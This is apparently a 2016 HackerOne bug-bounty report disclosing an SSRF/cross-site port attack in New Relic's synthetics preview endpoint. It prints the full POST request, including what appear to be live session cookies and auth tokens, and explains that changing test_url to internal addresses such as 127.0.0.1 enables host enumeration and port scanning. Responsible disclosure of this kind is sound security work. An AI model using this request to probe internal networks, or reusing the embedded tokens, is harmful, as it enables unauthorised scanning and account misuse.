New Relic: http://newrelic.com SSRF/XSPA

2016-06-23T20:11:10
ID H1:146875
Type hackerone
Reporter grampae
Modified 2016-08-26T23:10:29

Description

A Server Side Request Forgery / Cross Site Port Attack was discovered via a POST request to http://newrelic.com/synthetics_previews and using the parameter within the body of the request test_url.

A Server Side Request Forgery vulnerability allows to issue remote connections on behalf of the affected server. This can be exploited in order to reach internal systems, which are not reachable from the Internet, or to bypass access restrictions.

I have successfully used the following post request to enumerate live hosts on the 23.235.47.1-254 range as well as port scan to determine open and closed ports.

The post request is as follows:

POST /synthetics_previews HTTP/1.1 Host: newrelic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Referer: https://newrelic.com/synthetics Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 243 Cookie: _ga=GA1.2.1765600361.1464869449; _storefront_z8f3h2_2016_session=8e04fe6989368b093ee1f811d7ce5bde; __qca=P0-136215009-1464869495824; __ar_v4=7QCUSMLEMBHIPPEMTU6A7A%3A20160602%3A1%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20160602%3A2%7CYCNZVXZ6TJDJ3KMJRVGKFH%3A20160602%3A2%7CDLQZ5QQWIFBZZM5ECJME6X%3A20160602%3A1; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2294fbf617-d507-4b8f-b2f5-e017b0bc5817%22; optimizelyEndUserId=oeu1464869500423r0.3285744939018391; optimizelySegments=%7B%22171941824%22%3A%22ff%22%2C%22172184284%22%3A%22false%22%2C%22172242367%22%3A%22direct%22%2C%221025373943%22%3A%22none%22%2C%221227391094%22%3A%22Mid%20Market%22%7D; optimizelyBuckets=%7B%7D; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1464869512429-57371; ei_client_id=5750229e8d907b1100a7b88d; hblid=WHYc4cyrO4fPZ1bg4d2T53W3JTAZGU5G; olfsk=olfsk7476185233249074; login_service_login_newrelic_com_tokens=%7B%22token%22%3A%22VfKq5JbpOKhOTtUMCEtGQvX3xAlHQnL%2BQgDCx4BYR4fYa%2FJGuU50ZpktlpeZIYSFH7IqLgsFiF5Us5ahag5eWazizV%2BCHDTq7Of7JD%2F%2BqjPEfGpOZGNo3JJkJFTgs7Jl9rMPlpYIg1dfpH4Hefl7gX1u8sCKnL4lxBMM8LJ%2BGYKkbxrPm%2FseiUgO6pRlToHNK2w%2FVt9OlqWjQm8nbo%2FoLiOMttIY%2Fa9gNvPDKPAT4t57A2TA%2FRN8de1kL0TMbDZM9c0fu0QG8RGz1GLDcCIREDQ6yjsV6eUn1%2BDC%2FfCsnM0veKGKON0LJOSfy8ZMEIvJdgHJJWwHZKW7Tw4%2B92ghpA%3D%3D%22%2C%22refresh_token%22%3A%22e1bTa1aZJEPBbReJbxbKNWPP3Sj0TJJJJ5xTRZ7bH3a45zg6%2F69VoP8zwNJvJyULIq%2FsCkeCd2Gc3VkMlbXoDhe0rCefa7Vvxz5IVIYDYPHYBfSQjxlaMvbln9Lm2theenrXBZNYGskZPZhx9ZLW6mLUKwOG1wS18VqN5DYLL3MJUbzsWeXvVSWE5Rl2c7RdIHVW8%2BffFZs2ycU3SV4BEiXOZgiCYgMF%2Fq08VYXDtB0FqbNmxf7vWiUylydmtKQWGcfKsD2%2BFQLA4ZEpCI%2BG%2Bvb1toUrfpepQKPO8%2BRBk6XWgBUHplEp4lvWeJpq%2BtilXuhasGzY%2FhO6Z3%2FJD5w%2F9A%3D%3D%22%7D; syn_preview_count=BAhpCg%3D%3D--ceb27632ec3515dcaa43ec547fe5cb3389471630; __distillery=945b524_9329f52f-4f70-4e70-accf-2b7f38370b05-fdd900df1-67520459572c-da4f

utf8=%E2%9C%93&authenticity_token=c52RXD%2BUQjWr2OIMeD%2BRZ4WSH%2B7CXwAzokUuNwU1JY0%3D&synthetics_preview%5Btest_url%5D=www.yahoo.com&synthetics_preview%5Bemail%5D=admin%40yahoo.com&synthetics_preview%5Bdb_fields%5D=%7B%7D&commit=Run+Free+Test

In testing for this vulnerability I used the program "OWASP Skanda" however it would be trivial to replace the attribute for test_url to 127.0.0.1:80 or whichever url you are trying to enumerate.

I realize that this is a function to show up-time for any url a visitor specifies, however hopefully it could be limited to a specific scope to deter repeated requests.

Thanks!